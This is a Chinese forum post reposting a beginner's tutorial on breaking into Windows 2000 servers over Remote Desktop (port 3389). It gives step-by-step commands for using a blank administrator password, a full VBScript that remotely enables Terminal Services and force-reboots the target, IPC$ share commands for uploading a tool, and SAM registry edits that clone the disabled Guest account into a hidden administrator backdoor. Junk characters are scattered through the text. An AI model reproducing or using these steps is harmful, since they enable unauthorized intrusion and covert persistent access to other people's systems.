设为首页收藏本站
开启辅助访问

下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
下沙论坛»下沙论坛 ╃摩登&时代╃ 科技.电脑网络 一次简单的3389入侵
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
返回列表 发新帖
查看: 3511|回复: 4
打印 上一主题 下一主题

一次简单的3389入侵

[复制链接]
firelinux

该用户从未签到
跳转到指定楼层
1
发表于 2003-3-17 15:34:00 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
一次简单的3389入侵过程 * {5 ^6 k | @) d8 c C4 r原创:caozhe(草哲) & k. g- A, l# E5 W5 _ 来源:中国欲网技术论坛--草哲 9 _. H) c% X4 U }# [2 f! A ( ?3 T# _& s! [7 ]* j9 y# a$ O我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!3 }* w$ `6 v4 _- A+ ` K4 h$ I- s ; {' } _" U7 V; I! R: C于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~! : z; h% M6 m3 O j+ W要入侵,我建议你在win2000环境下来*作!6 Q- B* Y+ z- e) Y& x: u. { ' q* _" C' h! h+ v: G% W- f6 m 首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西! 5 h* u( n; X7 V扫描的X-Scan V2.3、WINNTAutoAttack、流光! X- _2 _! b) o n1 u X-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!! i" D' w2 k7 ]2 f 远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe) + L& r S# k% N" \6 s" ^1 [8 H, u克隆帐户用个psu就可以了~! # i# n; A2 m" z - u' W; `: F+ e2 vOK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空2 x& L: Z2 p* O- K( S+ W" R/ t 运行CMD(2000下的DOS),我们给它开终端! % F; U* N; c* u3 s# i4 v命令如下! - o9 y3 ?# O8 ~ }7 j8 p' l$ rcscript rots.vbe 120.0.0.1 administrator "" 3389 /fr6 f" N$ S( B" {& a9 N 上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启) / u' ]7 r+ K8 S$ ?( i1 ?1 R) G y @ @ 因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装! # V; c8 K; x" v! r2 g& G) f1 i1 c# i3 c) ?& K1 ~0 f( w 一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t 9 X; W) ]( Y# u* _$ d' K& Q( o安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!# V8 e7 _4 }! ]/ Z" A1 t7 } 5 h8 H/ v, ~( x, n) `) V 回到DOS下!我们建立IPC$连接! 8 [8 I1 u( T/ Q3 M/ [* _net use \\120.0.0.1\ipc$ "" /user:"administrator" * x# R3 m% u/ z" ^7 Y$ `这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!) J: J6 m3 L0 d$ n4 m2 }3 ]' D2 d9 E! f copy psu.exe \\120.0.0.1\admin$\system32 # e. ~+ Z% A2 W- J8 c9 C上传完毕后,开始在肉鸡做后门帐户!看肉鸡!: j, c8 D7 \2 D! m . p1 }! I; L e1 c* ^9 I% H: f 假设guest用户被禁用,我们就是要利用guest做后门帐户!% T, X5 W% f( ^" c% f6 f1 G 在该服务器运行CMD,在命令行下输入9 G4 I, J; n* ?& r& Y6 m* N psu -p regedit -i PID$ D! p, l% \8 d* D3 E$ S2 U" C8 w : ]$ n$ U p- J+ Z! A 这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器! . p3 C+ a0 j- ]5 \, i3 V3 x看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458: Z+ k0 G+ I6 i 那么,命令就是这样 ' o; o/ t$ N3 |8 L7 r3 P, Z1 D/ c2 a) o& Zpsu -p regedit -i 5458 0 P) p+ A# Q) _- s/ @8 J/ ^5 N这样直接打开注册表,可以读取本地sam的信息。 6 Q# v! R F' C: M打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users ; p: P* B" Q8 n- J0 f0 k0 ~# }下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!+ l& Y1 V2 J+ G+ C; s HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names* K2 @5 w) S! ^- @+ p' ^/ A7 ]! B& e Y 查看administrator的类型,是if4,再看guest的是if5 9 v: `; {% B! X# m) m; u好了,知道了类型后,打开0 n) _, e: \& Q( l- } HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 3 [) X. e% A& H& }5 ]/ r这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开 & @$ G% S1 h! h5 QHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F51 m+ ?0 d+ i) Z1 S, w 双击右侧的F,把刚复制的粘贴到里面! 0 j4 x$ |3 W. A, s$ G ! n5 L! b' k& K' O做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 % \1 V1 b8 G" L# H2 s和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest4 [$ @3 X# ^& f6 E; v 这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。2 R, N/ a/ W4 J2 V/ j" X + `/ H6 T6 t) O& R! _ 打开CMD,在命令行下输入& e5 B, @' w+ v& l9 v) [ net user guest password 6 f6 U+ B* T5 M1 v# D这条命令是给guest设置密码,后面的password就是密码 1 j+ G8 S+ t) m- E然后输入 ( d) `9 i- i h& u# G% z. Gnet user guest /active:y 8 j. k$ I5 F. j$ e$ q1 v这命令是激活guest帐户,然后我们把他禁用/ ?9 \; c' V! g6 Z" Q6 [ net user guest /active:n6 e4 O1 [* n$ ], }: U8 }0 @2 W1 O 上面的三行命令必须在DOS下执行!3 A' O; T; v! V ( P4 |, m, q8 C7 l7 C1 a OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!& c6 V: F- F6 @4 o 而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!1 M4 P2 y* M+ I% u1 q; O $ ^3 Y$ G, n) X6 d% p* t- N) { 注销一下,用guest登陆吧! 2 {9 _+ N& b: _0 [! s7 F! X! h) i& O+ ~ 打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊! + B& u7 W5 g! z1 l* f6 z$ M' z如果还有地方不明白的话,可以问我,我知道的一定告诉大家! b) q& D- y/ g; x, }) R8 \" T/ u4 g! `# }! Z; T, j1 {0 r 因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~! ' ~$ N, _5 j; ~0 @ b% J! t! E O" ^7 w/ T/ m4 f3 P- T: f ---------------------------------------------------------------------- * V8 X* }' |7 z- V以下是开终端的脚本,把它存为*.vbe ; [4 V9 G$ P3 v0 H! con error resume next8 b! |# I: d: m$ C+ I set outstreem=wscript.stdout# k2 E6 [+ S0 j/ s set instreem=wscript.stdin! I9 j2 k# T2 i: C if (lcase(right(wscript.fullname,11))="wscript.exe") then; U9 d* a. B& r3 ]5 u7 U8 ] set objShell=wscript.createObject("wscript.shell") ! `! H" m- ^6 r5 B& F objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) . X! g2 Y! Q' {6 ? h6 ` e( t wscript.quit & L: d$ c4 r* ?% Iend if 9 w& ^: N4 ~ `: ]& q3 ]& yif wscript.arguments.count<3 then' L4 Q+ o, Z; G) }- u usage()) l) m- s4 k# `3 f& D: _ m wscript.echo "Not enough parameters."7 L( M6 g5 H" Q1 }* o wscript.quit5 F% F+ g+ q" ]0 ^) f end if/ X8 ^4 F) u, ~7 U& J , m* U6 b! q9 ]; ] ipaddress=wscript.arguments(0) 9 z! w/ i$ ?+ s* X- f( |. Cusername=wscript.arguments(1) 6 A. U9 V9 W4 V, J0 ]. L% lpassword=wscript.arguments(2) ' z# g+ i3 ~+ r9 A* B" i+ o4 ~* @0 wif wscript.arguments.count>3 then 9 c% Z1 i5 b5 J8 O3 W5 I port=wscript.arguments(3): ^5 z1 e: N2 J. d else 2 n3 `! c0 J2 {9 d8 L& B5 A port=33892 g4 e* O: z- e end if ?+ k; k5 g W, ~% R0 Z$ p& ] if not isnumeric(port) or port<1 or port>65000 then1 V' V0 L* S! n3 m3 |8 n3 m0 u wscript.echo "The number of port is error." 0 D5 O& N& R4 R; j% [5 Z6 u wscript.quit+ {" S" o6 S9 ~( M+ K% ~ end if % e$ k" A4 k' h' D( u4 Nif wscript.arguments.count>4 then 7 U3 g! \& p' ~- n reboot=wscript.arguments(4) ! \% X1 G& E. t" Y8 N# C( l" celse ( i! T# u$ X- _/ m- Q reboot="" 2 _$ Q+ i: J5 v. H; Z: F% [end if+ r- L5 }" l5 I3 ?6 o; o / y- _) H" U9 t& ~% u usage()5 x% [6 h w) D2 j# D3 a+ B outstreem.write "Conneting "&ipaddress&" ...."6 V/ G( }& f0 D set objlocator=createobject("wbemscripting.swbemlocator") + p+ v C5 K8 c: D% bset objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)$ h4 _6 q; w3 z! E4 T) w# A2 J showerror(err.number)' G6 y) r( L3 B8 {7 w+ W objswbemservices.security_.privileges.add 23,true3 |) F6 F- ?' f, ^; y$ x" i1 ^) f objswbemservices.security_.privileges.add 18,true 7 r2 R; V) x' Y) N! U: G) Z 7 S+ `- W8 ]) noutstreem.write "Checking OS type...."8 x5 {2 S0 [( j5 d set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")7 U/ [8 [8 d& _- G0 e2 ] X for each objinstoscaption in colinstoscaption 9 O' g/ j+ o# q t if instr(objinstoscaption.caption,"Server")>0 then: G. J B9 O1 Q6 g7 w wscript.echo "OK!"6 O( R: i9 G$ P# q7 B6 E else : N# {/ l3 i" T9 N* p wscript.echo "OS type is "&objinstoscaption.caption * H6 e7 J8 r; D; c0 j3 K outstreem.write "Do you want to cancel setup?[y/n]"$ [4 o0 i/ C7 {' d4 u strcancel=instreem.readline }0 K* {+ W9 C# g' i/ q) R if lcase(strcancel)<>"n" then wscript.quit & F' G0 U) A# e; J5 y3 P end if $ N6 t) K; j, i, L$ x9 unext) O+ x0 `% N& m 2 Z) u/ y" H/ u9 `" F outstreem.write "Writing into registry ...." ( [2 O* K. g% l0 O; Zset objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")2 M9 w; m4 X0 s, ? HKLM=&h80000002 $ T' b4 x& [7 |# jHKU=&h80000003 ) ^# H- ~5 K7 v& I1 V. q1 Z5 ]with objinstreg / p8 R; ?2 H3 ]# P) @. s.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" ) H6 l: `& ^2 X9 U. N! n.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0 & |* i2 ^% h$ B' l( R; O.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" 4 e& a5 q9 r! e- s8 H.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 - Z- b6 T# v7 d K" p.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1% x. Y$ B( j# G! \: w' F! ?/ B% [+ g .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2+ S& {) `/ R7 X4 j3 t6 u, x .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2" M9 f3 e0 {3 R, P( h; G .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1" # a" H( p3 J+ N: y.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port1 S# f( i, E' j ^! b, }6 L end with# B, e9 }) s: e3 O showerror(err.number) , O9 \4 X) J" E8 g* ~' i 3 I Z3 V0 Y$ {- {. Z( Arebt=lcase(reboot); [; s; g3 D, V8 M/ ^* p. v flag=0 . {) C, |4 n# f$ N( w( Xif rebt="/r" or rebt="-r" or rebt="\r" then flag=2 & k: L( d2 c% o0 {# g5 tif rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6 9 s ~. p. }5 d4 _if flag<>0 then f, M" r8 T5 {0 M. | outstreem.write "Now, reboot target...." , G! @0 `6 E. G3 e7 M strwqlquery="select * from win32_operatingsystem where primary='true'" 5 a, L. V# p2 { ] set colinstances=objswbemservices.execquery(strwqlquery) 5 V ]; k3 O$ h/ a+ g1 r4 h5 Q Q for each objinstance in colinstances5 J! w9 U) N4 b objinstance.win32shutdown(flag) / K, [; H. u6 ]# q R! Q5 D next : v; a; ?+ L7 B9 S6 R showerror(err.number)+ y9 ?) x: i( N% k) W else - e9 D! |) {% P; n9 d( ? wscript.echo "You need to reboot target."&vbcrlf&"Then," / g/ w! e! L! a& aend if- B% L2 r/ d6 W; o: n7 _) j7 M wscript.echo "You can logon terminal services on "&port&" later. Good luck!" ; L2 h3 n5 Z Y ! t; ]0 }3 A! A/ Tfunction showerror(errornumber)7 F6 X `# r- y if errornumber Then" d6 l' q. M: H6 G; K wscript.echo "Error 0x"&cstr(hex(err.number))&" .". R0 e- E4 i/ c. t if err.description <> "" then ) t! F- _- }8 k! z& J- l wscript.echo "Error description: "&err.description&"." ( K# n* n* B5 m8 z* C end if; j+ x* C5 h) z wscript.quit ( l- n1 v, u9 o& K" l- B& Delse; `2 E5 I8 b* k wscript.echo "OK!" 6 J. p$ M. A8 o; R8 q' {. g. ?$ Oend if / o% ~6 m8 i3 Y- o- b: u3 yend function ( {0 C0 o- B! b; t2 Y / @6 `3 W( u R" x* ufunction usage()8 _" ~1 W5 Y/ O; p1 V: m wscript.echo string(79,"*")" o$ z, U3 q3 v+ J- K) Z1 U4 S; ] wscript.echo "ROTS v1.05" / @2 z: G3 o, N5 l4 N! R+ |8 }+ g/ _wscript.echo "Remote Open Terminal services Script, by 草哲"$ t0 k( r4 ~/ K% z+ [ wscript.echo "Welcome to visite www.5458.net"/ ]+ K( J4 \3 L$ L; S wscript.echo "Usage:" % v. h: ~/ B: Z; E' @9 Q9 wwscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"7 d) ?+ q) p, M! J2 n. Q wscript.echo "port: default number is 3389.": m' l& Q& A0 n3 i4 k/ O6 } wscript.echo "/r: auto reboot target." % x+ c' y1 `* }+ ]( d: gwscript.echo "/fr: auto force reboot target." - \' r# k1 y1 ]* iwscript.echo string(79,"*")&vbcrlf" h; v9 L; a) E- P4 A end function! T/ r0 p! Q2 M' K4 Z s1 w2 F$ I t' R7 l( ] 转自安全焦点
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩 转发到微博
回复

使用道具 举报

返回列表 发新帖

本版积分规则

关闭

下沙大学生网推荐上一条 /1 下一条

快速回复 返回顶部 返回列表